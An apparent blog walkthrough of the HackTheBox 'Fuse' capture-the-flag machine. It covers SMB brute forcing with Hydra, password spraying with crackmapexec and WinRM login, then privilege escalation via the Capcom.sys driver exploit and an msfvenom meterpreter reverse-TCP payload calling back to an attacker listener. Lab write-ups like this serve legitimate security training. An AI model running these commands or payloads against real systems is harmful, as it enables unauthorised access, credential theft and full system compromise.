Today we are going to crack a machine called Fuse. It was created by egre55. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Browsing HTTP Service
o
Crafting Dictionary for Bruteforce using CeWL
o
Bruteforcing SMB using Hydra
o
Connecting using RPCClient
o
Enumerating Printer Logs
·
Exploitation
o
Password Spraying using Crackmapexec
o
Logging using Evil-WinRM
o
Reading User Flag
·
Privilege Escalation
o
Checking Privileges for the user
o
Exploiting SeLoadDriver Privilege using Capcom
Exploit
o
Reading Root Flag
Walkthrough
Network Scanning
To Attack any machine, we need the IP Address. Machine
hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.2.5
Now that we have the IP Address. We need to enumerate open
ports on the machine. For this, we will be running a nmap scan.
nmap -sC -sV 10.129.2.5
The Nmap Version scan quickly gave us some great
information. It positively informed that the following ports and services are
running: 53 (DNS), 80 (HTTP) 139 (SMB) and other Windows Server Services. Now
it is clear that this is a Windows OS based Machine. The OS detected is
Microsoft Server 2016.
Enumeration
We tried to access
the HTTP service but we were not redirected. This means we need to add an entry
in the /etc/hosts file.
After adding the entry, we are not able to access the HTTP
service. We find out that it is PaperCut Print Logger. It is a free software
that can log, audit and track on Windows systems and print servers. It is
pretty common in corporate environment where there want to keep track huge
array of employees and printers.
Upon inspecting different logs we see that the logs have the
user section. These users must also exist on the network, so we might need
these usernames for a Bruteforce.
For performing an bruteforce, we need to create a dictionary
of users first. To craft the dictionary, we used Cewl.
cewl -w pwd.txt --with-numbers
http://fuse.fabricorp.local/papercut/logs/html/index.htm
We decided to use Hydra as our bruteforcing tool. We got two
successful hits. One for user tlavel and bhult. Both use the same Fabricorp01
as password. First of all that is not a secure or complex password and two
employees using the same password that is unbelievable. What’s more shocking is
that if this was a real corporate network, we would have gotten like 50-60
users using the default or weak passwords. Hence, no matter how good your
infrastructure security is, if your employees are not using good password
practices, you are bound to get attacked.
hydra -L users.txt -P pwd.txt 10.129.2.5 smb
We try login using smbclient. We first try for the user
tlavel. It doesn’t login but instead it gave an error “NT_STATUS_PASSWORD_MUST_CHANGE”.
It basically means that we can’t login using this password. The password must
be changed for logging in. So, let’s change the password. Changing the password
on SMB requires Old password and then we can set a new password of our choice.
smbclient -L 10.129.2.5 -U tlavel
smbpasswd -r 10.129.2.5 -U tlavel
Fabricorp01
Password@123987
.
After spending enough time, we couldn’t find anything usable
inside the SMB shares. This is where we decided to enumerate further using the
RPC client. We use the credentials that we generated earlier. There are bunch
of enumeration scripts and commands that we can run here. But since during our
initial assessment of the HTTP service, we know that Paper Cut Print Logger is
installed on the Machine. It means we need to enumerate printers on the
network. We will use enumprinters for this task. Here we have a password
that is logged.
rpcclient -U tlavel 10.129.2.5
$fab@s3Rv1ce$1
enumprinters
Since we know a password but not the username asssociated
with it, We will perfom, Password Spraying. Learn more about Password Spraying
from here.
There are bunch of tools that can be used for password spraying. We will be
using Crackmapexec. After password spraying, we got to know that there is a
user 'svc-print' that have the password $fab@s3Rv1ce$1
crackmapexec winrm 10.129.2.5 -u users.txt -p
'$fab@s3Rv1ce$1'
Now using the newly found set of credentials and Evil-WINRM
we try to login. Here, after some enumeration, we found the user flag.
evil-winrm -i 10.129.2.5 -u svc-print -p '$fab@s3Rv1ce$1'
Privilege Escalation
To elevate to a higher-level user, we enumerated the
Privileges of the current user. It showed that SeLoadDrivverPrivilege is
Enabled for current user. It is a very dangerous privilege. It allows the user
to load kernel drivers and execute code with kernel privileges. We will be
using Capcom Driver Exploit to Elevate our privileges. To do this we first
needed to download the Capcom.sys driver file which will allow us to execute
arbitrary code on the system. We need to upload an executable file as well that
can run the driver sys file.
whoami /priv
upload /root/Downloads/Capcom.sys .
upload /root/Downloads/ExploitCapcom.exe .
Now, let’s test the ability of the Capcom Exploit to run commands
as NT Authority System. To test, we first need to load the diver sys file using
the executable. This will check for the
SeLoadDriver Privilege and then make appropriate entry in the registry. Now, we
can use the executable to run the commands as NT Authority.
.\ExploitCapcom.exe LOAD
C:\Users\svc-print\Documents\Capcom.sys
.\ExploitCapcom.exe EXPLOIT whoami
To get the elevated shell, we craft a reverse_tcp payload
using Msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=4444 -f exe > shell.exe
Now, we upload this crafted payload to the target system.
Now before executing it, we run Metasploit to create a handler for the shell.
We provide the LHOST and LPORT that we referred in the payload. Now we execute
the payload. We see that Capcom grabs a handle on memory and execute the
payload using elevated privileges.
upload /root/Downloads/shell.exe .
.\ExploitCapcom.exe EXPLOIT shell.exe
We went back to our Metasploit Listener to see that it
captured the session generated.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.52
exploit
getsystem
All that’s left is to read the root flag.
ls
cd Administrator
cd Desktop
cat root.txt
0 comments:
Post a Comment